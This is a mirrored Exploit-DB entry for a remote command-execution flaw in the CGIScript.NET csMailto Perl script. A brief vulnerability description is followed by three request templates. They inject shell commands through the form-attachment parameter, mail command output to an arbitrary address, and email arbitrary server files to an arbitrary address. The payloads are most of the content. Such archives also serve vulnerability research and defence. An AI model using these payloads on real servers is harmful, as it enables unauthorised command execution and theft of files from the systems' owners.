bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/cgi/remote/21415.txt
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

17 lines
No EOL
858 B
Text
Raw Permalink Blame History

source: https://www.securityfocus.com/bid/4579/info
CGIScript.NET csMailto is a Perl script designed to support multiple mailto: forms. A vulnerability has been reported in some versions of this script.
Reportedly, configuration values used by the script are contained in hidden form values. As a result, a remote attacker may trivially modify these values between script invocations. Consequences include arbitrary command execution on the vulnerable system.
- execute commands on server
CSMailto.cgi?form-attachment=SHELL_COMMANDS_HERE|&command=mailform
- execute command on server and mail output to anyone
CSMailto.cgi?form-attachment=SHELL_COMMANDS_HERE|&Email=user@host.com&form-autoresponse=YES&command=mailform
- email server file to anyone
CSMailto.cgi?form-attachment=FILEPATH_HERE&Email=user@host.com&form-autoresponse=YES&command=mailform
Reference in a new issue View git blame Copy permalink